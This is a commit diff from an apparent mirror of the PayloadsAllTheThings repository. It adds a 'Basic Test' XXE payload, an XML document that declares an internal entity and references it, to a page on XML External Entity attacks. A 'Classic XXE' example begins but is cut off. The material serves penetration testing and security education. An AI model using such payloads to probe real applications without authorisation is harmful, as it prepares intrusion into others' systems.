mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
NOSQL injection added + updates XSS/XXE
This commit is contained in:
@@ -3,6 +3,16 @@ An XML External Entity attack is a type of attack against an application that pa
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic Test
|
||||
```
|
||||
<!--?xml version="1.0" ?-->
|
||||
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
|
||||
<userInfo>
|
||||
<firstName>John</firstName>
|
||||
<lastName>&example;</lastName>
|
||||
</userInfo>
|
||||
```
|
||||
|
||||
Classic XXE
|
||||
```
|
||||
<?xml version="1.0"?>
|
||||
|
||||
Reference in New Issue
Block a user